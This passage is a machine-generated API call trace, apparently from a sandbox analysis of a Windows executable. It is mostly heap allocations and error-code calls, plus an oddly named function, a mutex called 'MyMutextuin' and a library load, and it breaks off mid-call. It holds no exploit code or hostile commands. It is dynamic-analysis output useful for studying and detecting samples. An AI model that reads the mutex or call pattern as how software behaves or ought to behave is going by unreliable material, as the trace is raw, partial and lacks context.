[0145.264] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.265] GetLastError () returned 0x0 [0145.265] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.266] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.266] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.266] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.266] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.266] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.266] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.266] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.266] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.266] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.266] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.266] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.266] SetLastError (dwErrCode=0x0) [0145.266] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.267] GetLastError () returned 0x0 [0145.267] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.268] SetLastError (dwErrCode=0x0) [0145.268] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] GetLastError () returned 0x0 [0145.269] SetLastError (dwErrCode=0x0) [0145.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x90) returned 0x478d2f8 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x1f) returned 0x478a9a0 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x2e) returned 0x478f708 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x37) returned 0x4792fa8 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x3c) returned 0x4790250 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x31) returned 0x4792968 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x14) returned 0x4798d50 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x24) returned 0x4797ec0 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0xd) returned 0x478db70 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x1d) returned 0x478a9c8 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x31) returned 0x4798fb8 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x15) returned 0x4798c50 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x17) returned 0x4798b50 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0xe) returned 0x478dbe8 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x69) returned 0x478b560 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x3e) returned 0x47905b0 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x1b) returned 0x478aab8 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x1d) returned 0x478aa18 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x48) returned 0x47925c0 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x12) returned 0x4798c70 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x18) returned 0x4798b90 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x1b) returned 0x478aa68 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x24) returned 0x478b4e8 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x29) returned 0x478f9a8 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x1e) returned 0x479a628 [0145.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x69) returned 0x4785750 [0145.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x17) returned 0x4798cb0 [0145.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0xf) returned 0x478db28 [0145.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x16) returned 0x4798c30 [0145.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x2a) returned 0x478fa88 [0145.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x29) returned 0x478fcf0 [0145.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x12) returned 0x4798d30 [0145.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x21) returned 0x479a7a0 [0145.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x16) returned 0x4798db0 [0145.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x22) returned 0x479a770 [0145.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x12) returned 0x4798cf0 [0145.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4797f00 | out: hHeap=0x4780000) returned 1 [0145.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x80) returned 0x478afe8 [0145.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x800) returned 0x479aa60 [0145.272] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0145.272] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.273] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.274] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x478ff48 [0145.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a3a8 [0145.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47851e0 [0145.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47851e0 | out: hHeap=0x4780000) returned 1 [0145.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47851e0 [0145.275] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x478b7b0 [0145.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798d70 [0145.284] GetLastError () returned 0x0 [0145.284] SetLastError (dwErrCode=0x0) [0145.284] GetLastError () returned 0x0 [0145.284] SetLastError (dwErrCode=0x0) [0145.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0xb8) returned 0x4797ef0 [0145.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6a6) returned 0x479b268 [0145.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479b268 | out: hHeap=0x4780000) returned 1 [0145.285] GetLastError () returned 0x0 [0145.285] SetLastError (dwErrCode=0x0) [0145.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x478b518 [0145.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x478d7e0 [0145.286] GetLastError () returned 0x0 [0145.286] SetLastError (dwErrCode=0x0) [0145.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x4) returned 0x478ffd0 [0145.286] GetLastError () returned 0x0 [0145.286] SetLastError (dwErrCode=0x0) [0145.286] GetLastError () returned 0x0 [0145.286] SetLastError (dwErrCode=0x0) [0145.286] GetLastError () returned 0x0 [0145.286] SetLastError (dwErrCode=0x0) [0145.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0xb8) returned 0x4797fb0 [0145.286] GetLastError () returned 0x0 [0145.286] SetLastError (dwErrCode=0x0) [0145.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6a6) returned 0x479b268 [0145.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479b268 | out: hHeap=0x4780000) returned 1 [0145.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478b518 | out: hHeap=0x4780000) returned 1 [0145.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4797ef0 | out: hHeap=0x4780000) returned 1 [0145.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ffd0 | out: hHeap=0x4780000) returned 1 [0145.287] GetLastError () returned 0x0 [0145.287] SetLastError (dwErrCode=0x0) [0145.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x478ffd0 [0145.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x478b518 [0145.287] GetLastError () returned 0x0 [0145.287] SetLastError (dwErrCode=0x0) [0145.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x200) returned 0x4798070 [0145.287] GetLastError () returned 0x0 [0145.287] SetLastError (dwErrCode=0x0) [0145.287] GetLastError () returned 0x0 [0145.287] SetLastError (dwErrCode=0x0) [0145.287] GetLastError () returned 0x0 [0145.287] SetLastError (dwErrCode=0x0) [0145.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x4) returned 0x478b070 [0145.288] GetLastError () returned 0x0 [0145.288] SetLastError (dwErrCode=0x0) [0145.288] GetLastError () returned 0x0 [0145.288] SetLastError (dwErrCode=0x0) [0145.288] GetLastError () returned 0x0 [0145.288] SetLastError (dwErrCode=0x0) [0145.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0xb8) returned 0x4797ef0 [0145.288] GetLastError () returned 0x0 [0145.288] SetLastError (dwErrCode=0x0) [0145.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6a6) returned 0x479b268 [0145.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479b268 | out: hHeap=0x4780000) returned 1 [0145.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ffd0 | out: hHeap=0x4780000) returned 1 [0145.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4797fb0 | out: hHeap=0x4780000) returned 1 [0145.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478b070 | out: hHeap=0x4780000) returned 1 [0145.288] GetLastError () returned 0x0 [0145.289] SetLastError (dwErrCode=0x0) [0145.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x478ffd0 [0145.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478b518 | out: hHeap=0x4780000) returned 1 [0145.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478d7e0 | out: hHeap=0x4780000) returned 1 [0145.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x478d7e0 [0145.289] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.289] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.289] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.290] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.290] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.290] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791dd0 [0145.290] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.291] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.291] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.291] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x478db58 [0145.292] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a470 [0145.292] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478db58 | out: hHeap=0x4780000) returned 1 [0145.292] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478f900 [0145.292] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a470 | out: hHeap=0x4780000) returned 1 [0145.292] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x40) returned 0x4790520 [0145.293] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478f900 | out: hHeap=0x4780000) returned 1 [0145.293] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x478ae28 [0145.293] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4790520 | out: hHeap=0x4780000) returned 1 [0145.293] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x90) returned 0x4797fb0 [0145.293] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ae28 | out: hHeap=0x4780000) returned 1 [0145.293] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd0) returned 0x4798278 [0145.293] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4797fb0 | out: hHeap=0x4780000) returned 1 [0145.293] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x130) returned 0x479b268 [0145.293] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798278 | out: hHeap=0x4780000) returned 1 [0145.294] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c0) returned 0x479b3a0 [0145.294] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479b268 | out: hHeap=0x4780000) returned 1 [0145.294] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x478db58 [0145.294] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a3f8 [0145.294] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478db58 | out: hHeap=0x4780000) returned 1 [0145.294] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478f9e0 [0145.294] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a3f8 | out: hHeap=0x4780000) returned 1 [0145.294] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x40) returned 0x4790370 [0145.295] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478f9e0 | out: hHeap=0x4780000) returned 1 [0145.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x478ae28 [0145.295] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4790370 | out: hHeap=0x4780000) returned 1 [0145.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x90) returned 0x4797fb0 [0145.295] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ae28 | out: hHeap=0x4780000) returned 1 [0145.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478fd98 [0145.295] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478afe8) returned 0x80 [0145.472] Rdwmnjioffws () [0145.472] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="MyMutextuin") returned 0x1f4 [0145.473] GetLastError () returned 0x0 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a5b0 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a420 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a3d0 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a4c0 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a5d8 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478fb68 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478f938 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791b68 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478f7b0 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a510 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a538 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a448 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a4e8 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a470 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a560 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a588 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a3f8 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791fe0 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a600 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a380 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a088 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a128 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4799fc0 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478fc48 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a218 [0145.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4799f70 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4799ed0 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4799f48 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478fba0 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a060 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4799ef8 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a150 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478fbd8 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478fc80 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478f900 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478fcb8 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478f7e8 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4799ea8 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a0b0 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a1c8 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4799f98 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4799fe8 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a010 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a038 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478fd28 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478f820 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x4785808 [0145.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a100 [0145.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x479e7c8 [0145.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e8e8 [0145.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7c8 | out: hHeap=0x4780000) returned 1 [0145.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x479e8c8 [0145.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8e8 | out: hHeap=0x4780000) returned 1 [0145.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e8d8 [0145.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8c8 | out: hHeap=0x4780000) returned 1 [0145.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e748 [0145.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8d8 | out: hHeap=0x4780000) returned 1 [0145.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x478ba78 [0145.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e748 | out: hHeap=0x4780000) returned 1 [0145.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x478bb50 [0145.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ba78 | out: hHeap=0x4780000) returned 1 [0145.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798d90 [0145.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478bb50 | out: hHeap=0x4780000) returned 1 [0145.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x478ba78 [0145.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a2b8 [0145.476] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a2b8 | out: hHeap=0x4780000) returned 1 [0145.476] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798d90 | out: hHeap=0x4780000) returned 1 [0145.476] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xdf2ac, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0145.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a2e0 [0145.477] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xdf2ac, cbMultiByte=12, lpWideCharStr=0x479a2e0, cchWideChar=12 | out: lpWideCharStr="Kernel32.dll") returned 12 [0145.477] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x76720000 [0145.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x479e858 [0145.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e8d8 [0145.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e858 | out: hHeap=0x4780000) returned 1 [0145.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x479e8e8 [0145.477] HeapFree (in: 